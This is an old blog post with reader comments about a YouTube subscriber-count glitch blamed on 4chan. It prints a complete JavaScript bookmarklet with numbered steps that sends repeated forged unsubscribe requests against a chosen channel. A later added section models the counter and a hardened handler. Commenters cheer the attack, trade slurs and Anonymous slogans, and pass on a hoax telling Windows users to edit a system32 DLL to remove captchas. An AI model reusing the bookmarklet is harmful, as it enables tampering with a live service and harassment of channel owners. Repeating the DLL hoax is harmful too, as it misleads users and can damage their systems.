The Hack o blog
Reinventing the weel
YouTube subscriber glitch: Fred and TunderF00T got hacked
Today multiple YouTube accounts got “hacked”, and the attack is still going on. It was perpetrated by the /b/tards of the ever more infamous 4chan (“thanks moot”). Affected accounts include Fred and TunderF00t, and the problem has not yet been sorted. The YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel; it uses a hole in the JavaScript: a lack of verification.
I will write up how this script worked, but for now here is the malicious code.
This is how it works: the script in the API usually requires a user to validate the action. The script overrides that, picks a random user to validate and unsubscribes them. The user isn’t actually unsubscribed, and the counter is merely decremented. YouTube has had problems in the past with the counters being artificially increased; they haven’t fixed the problem, and all they do is recount the subscribers.
Do not do this!!
1 Locate The target channel and subscribe
2 Open multiple page tabs
3 Paste this code into the browsers address bar
javascript:function unsubscribe() { httpreq=new XMLHttpRequest(); httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false); httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC')); if(!httpreq.responseXML) { setTimeout('unsubscribe()', timeout); return; } if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!=' </address> <h2>You have successfully unsubscribed.</h2> ') { alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue); } else if((window.status=++count)!=times) { setTimeout('unsubscribe()', timeout); } else { alert('DUN'); } } count=0; if((username=prompt('enter target\'s username', '\\*username here *\\'))!=null) { if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) { if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) { unsubscribe(); } } } void(0);
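The counter behaviour described in the post (the displayed count drops although nobody is really unsubscribed, and a recount repairs it), modelled as an added example alongside a handler that checks membership first. This is not YouTube's code or part of the original post; the class, method names and sample users are constructed assumptions.

```javascript
// Constructed model of a subscriber counter; all names are hypothetical.
class Channel {
  constructor(name) {
    this.name = name;
    this.subscribers = new Set(); // source of truth: who is subscribed
    this.cachedCount = 0;         // denormalized counter shown on the page
  }
  subscribe(user) {
    if (!this.subscribers.has(user)) {
      this.subscribers.add(user);
      this.cachedCount += 1;
    }
  }
  // Weak handler: decrements on every request, even when the caller
  // is no longer (or never was) subscribed.
  unsubscribeWeak(user) {
    this.subscribers.delete(user);
    this.cachedCount -= 1;
    return this.cachedCount;
  }
  // Hardened handler: the counter moves only when a membership entry
  // was actually removed, so a repeated request is a no-op.
  unsubscribeChecked(user) {
    if (this.subscribers.delete(user)) {
      this.cachedCount -= 1;
    }
    return this.cachedCount;
  }
  // Recount from the source of truth (the repair the post mentions).
  recount() {
    this.cachedCount = this.subscribers.size;
    return this.cachedCount;
  }
}

// Sends the same user's unsubscribe request `times` times to one handler.
function replay(handlerName, times) {
  const ch = new Channel("example-channel"); // constructed sample data
  ["alice", "bob", "carol", "mallory"].forEach((u) => ch.subscribe(u));
  let shown = ch.cachedCount;
  for (let i = 0; i < times; i++) shown = ch[handlerName]("mallory");
  return { shown, actual: ch.subscribers.size, repaired: ch.recount() };
}

console.log("weak   :", replay("unsubscribeWeak", 10));
console.log("checked:", replay("unsubscribeChecked", 10));
```

A displayed count that diverges from the size of the membership set is also a usable detection signal for this kind of counter abuse.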
Lol pwned.
Pretty sweet but it will get your account perma banned from youtube.
Yes it will, it could even lead to police intervention depending on the country you are from.
Really? In which country?
Wrong, script exploitation is not against the law, it is up to the webmasters to keep their own stuff secure. No law enforcement will be able to punish someone for technically using what could be seen as a feature rather than a hole in security.
It was just bad security by the YouTube developers.
I am not a lawyer. And I realize this is an old article, but someone might come across it and maybe I’m contributing something.
It’s illegal in plenty of US States. I’m from Pennsylvania, and here is a link to the current statute:
http://www.legis.state.pa.us/WU01/LI/LI/CT/HTM/18/00.076.015.000..HTM
In the language of the statute, a judge might rule that this constitutes “alter or erase any computer data, computer programs or computer software;”
It is the subscription count that is altered.
For an interesting discussion on the subject of human law and what one might call “computer law,” the laws that computers obey, check out the book “Code and Other Laws of Cyberspace” by Lawrence Lessig.
And yes, in some countries malicious script execution can be illegal in some countries.
Hey guys no it will not make you banned it simply duplicates them
I know the guy who did it and he has been free for 2 weeks now. We both live in Ireland, by the way.
peace
Who fucking cares about that, really. Maybe in police state EU and US, but nowhere else where freedom still exists.
Very cool you guys, does this still work? How come others lost subs and some even 500 subs total? Doesn’t make sense or is it because of the youtube boxes?
Yes it still works, but using it will get you beaned permanently from YouTube.
No problem, I wasn’t wanting to do that, I’m a YouTube partner so last I would want to use such a code… it stopped though, any idea why? Have the hackers been caught? Also, do they IP ban or username ban?
All the users caught using this script have had their accounts banned. There won’t be a fix by the looks of it; they will just recount the subscribers, and wait till /b/ gets bored.
Will it ban your IP?
no your account
YEah, HackOblog is right. Don’t do this, you may be beaned…
awesome!!!
check out : youtube.com/watch?v=J82lqgrc-rM
also what’s the one for ADDING subscribers?
Originally it was done in PHP.
Old code as fuck.
Goddamn script kiddies taking the victory in other people’s work.
I’m not sure it was in PHP, but I know what you mean, it’s not really hacking. Hacking would involve some effort, but what would you expect from /b/?
It was PHP, made 2 years ago.
Never fixed. You might find the original hack by putting in site:pastebin.com whatever in google.
It was javascript. don’t assume things when you don’t even know the language.
Sure it is, on the part of the person who discovered this specific glitch. Whether or not it’s the same person as the one who started the attack on Fred, I don’t know. As for everyone else, most were just volunteers. Can’t call them hackers, just fredhaters. Hell, even I used it for a few seconds, didn’t notice anything going on so I closed it
hahahahahahhahaahaahahahahahahahhaha fred deserved it lol n00b
how does this work simply copy and pasting does not work (i only want to try this out on my own channel)
DO NOT DO THIS! Yes…so put it where people CAN do it ._.
It no longer works, well for now, and it’s information: the more widespread a bug is the faster it is fixed, information wants to be free and so on.
thumbs up if traveler sent u here.
Err… you misspelled “ThunderF00T”
Who would ever want to hack him lol??
I have misspelled a lot of it, its the H0B moto Bad Spelling lol
Do SxePhil’s dumb azz next!
hack justin beavers next!! how about not!!!
Lol 4chan FTW! 😀
well this happens if great minds think alike 😀
I saw this on /b/:
“Hey newfags, I bet you didn’t know that you could get rid of those annoying captchas did you?
Well I’m feeling generous today and I thought i’d help you out and give some protips.
To remove captchas simply. (Sorry Windows only, macs are gay anyway)
1. Open My Computer.
2. Click C: drive, then open WINDOWS folder.
3. Find system32, DO NOT DELETE THIS FOLDER.
4. Open system32, and find a file called capesnpn.dll.
5. Click open with and choose notepad (Make sure you click always open with this program)
6. Hit ctrl+F and find the code 0000a1b34 and delete it.
7. Save the file and voila! no more captchas!
This works because the captcha is stored on your PC, and doesn’t work anymore if you delete that code!
TL ; DR – Get rid of captcha, read steps 1-7”
is this true? is safe? or is a scam?
no its not true, don’t do it,
no. it will mess up your computer.
I’m sorry, but whats a /B/tard?
Basically it’s the name given to the users of the /b/ board of 4chan.
WHAT IS THE HACKERS UTUBE ACCOUNT SO I KNOW WHO NOT TO SUB
AND WHAT KIND OF VIDEOS ARE THERE
Uh…I don’t know what /B/ is. But, it wasn’t 4Chan, it was EBaums. 4Chan is a nice, family-friendly site.
“4chan is a nice, family-friendly site*
fail…
lol. 4chan and family-friendly do not belong in the same sentence. give the site a peek if you want to know what I mean.
clever bastards
I think it’s funny, because people like me who have no subs could sit back and laugh as the fags cry and wonder why their subs were going down. I also love how people say it was Ebaums, or whatever. Those newfags couldn’t do shit like this.
Now a technical question, instead of all this… Why is the ‘username’ variable undefined?
As in: edit_subscription=newsub&username=’+username+’&subscription_level=unsubscribe’, false);
I will attempt to answer technical questions in an upcoming post, do feel free to email me any you have.
The script prompts the user for the username before calling the unsubscribe function.
They did it for the LULZ
Wow, the guys who did that were completely stupid.
well if they hacked FRED …… then its fine by me !
4chan fails at life and everything else they do! Fred is alright but he gets annoying, and isn’t it called harassment or something like that?
Very interesting, i think it is very important to know that. Don’t hesitate to share it again, i think it is so useful to know.
The script in the API? That makes no sense.
We are anonymous.
We are Legion.
United as ONE.
Divided by zero.
We do not forgive Censorship.
We do not forget Oppression.
US SENATE…
Expect us!!
I will take your united 1, and divide it by 0. 0000000000000000000000000000000000000000000000000000000000000
Well they were smart to find this and all. 4chan has some pretty smart guys on it.